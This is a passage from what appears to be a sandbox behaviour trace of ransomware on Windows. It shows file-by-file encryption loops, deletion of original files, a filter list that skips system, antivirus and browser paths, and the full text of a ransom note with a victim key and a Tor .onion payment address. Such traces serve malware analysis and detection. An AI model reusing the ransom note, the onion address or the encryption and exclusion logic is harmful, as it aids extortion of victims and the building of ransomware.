hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.202] GetLastError () returned 0x0 [0161.202] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.202] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.202] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.202] GetLastError () returned 0x0 [0161.202] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.202] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.202] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.202] GetLastError () returned 0x0 [0161.202] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.202] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.202] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.202] GetLastError () returned 0x0 [0161.202] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.202] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.202] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.202] GetLastError () returned 0x0 [0161.202] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.202] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.203] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.203] GetLastError () returned 0x0 [0161.203] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.203] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.203] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.203] GetLastError () returned 0x0 [0161.203] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.203] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.203] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.203] GetLastError () returned 0x0 [0161.203] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.203] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.203] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.203] GetLastError () returned 0x0 [0161.203] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.203] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.203] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.203] GetLastError () returned 0x0 [0161.203] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.203] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.203] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.203] GetLastError () returned 0x0 [0161.203] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.203] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.204] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.204] GetLastError () returned 0x0 [0161.204] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.204] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.204] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0161.204] GetLastError () returned 0x0 [0161.204] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0161.204] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0161.204] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0161.204] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui")) returned 0x20 [0161.204] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0161.204] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui") returned 1 [0161.204] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui")) returned 0 [0161.205] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" [0161.205] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA") returned 1 [0161.205] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\.xXE906.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\.xxe906.tmp")) returned 0xe906 [0161.206] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\.xXE906.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\.xxe906.tmp"), dwFlags=0x1) returned 0 [0161.206] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\.xXE906.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\.xxe906.tmp")) returned 1 [0161.207] CryptDestroyKey (hKey=0x9ad278) returned 1 [0161.207] wcslen (_String="OK") returned 0x2 [0161.207] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.207] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.207] CryptDestroyKey (hKey=0x9ad878) returned 1 [0161.207] CryptDestroyHash (hHash=0x9ad838) returned 1 [0161.207] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0161.207] FindNextFileW (in: hFindFile=0x9ad4b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0161.207] GetLastError () returned 0x12 [0161.207] FindClose (in: hFindFile=0x9ad4b8 | out: hFindFile=0x9ad4b8) returned 1 [0161.207] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0161.207] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.208] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0161.208] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0161.208] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.208] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.208] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0161.208] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.208] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0161.208] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*.exe") returned 0 [0161.208] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*.dll") returned 0 [0161.208] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*.lnk") returned 0 [0161.208] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*.bat") returned 0 [0161.208] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*.ini") returned 0 [0161.208] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*.msi") returned 0 [0161.208] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*.scf") returned 0 [0161.208] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*pagefile.sys*") returned 0 [0161.208] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*NTUSER.DAT*") returned 0 [0161.208] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*AppData*") returned 0 [0161.208] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*\\winrar\\*") returned 0 [0161.208] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.208] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*\\java\\*") returned 0 [0161.208] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*\\windows\\*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*\\ESET\\*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*\\AVG\\*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*\\AVIRA\\*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*Atheros*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*Realtek*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*bootmgr*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*boot*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*boot*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*CONFIG.SYS*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*IO.SYS*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*MSDOS.SYS*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*NTDETECT.COM*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*ntldr*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*chrome*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*opera*") returned 0 [0161.209] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", pszSpec="*firefox*") returned 0 [0161.209] wcslen (_String="\\\\?\\") returned 0x4 [0161.209] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad1b8 [0161.209] wcscmp (_String1=".", _String2=".") returned 0 [0161.209] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0161.209] wcscmp (_String1="..", _String2=".") returned 1 [0161.209] wcscmp (_String1="..", _String2="..") returned 0 [0161.209] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0161.209] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0161.209] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0161.209] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0161.209] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0161.209] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0161.209] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0161.209] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0161.209] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0161.209] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0161.209] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0161.209] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0161.209] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0161.209] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0161.210] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0161.210] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui", pszSpec="*") returned 1 [0161.210] strlen (_Str="NMoreira") returned 0x8 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] 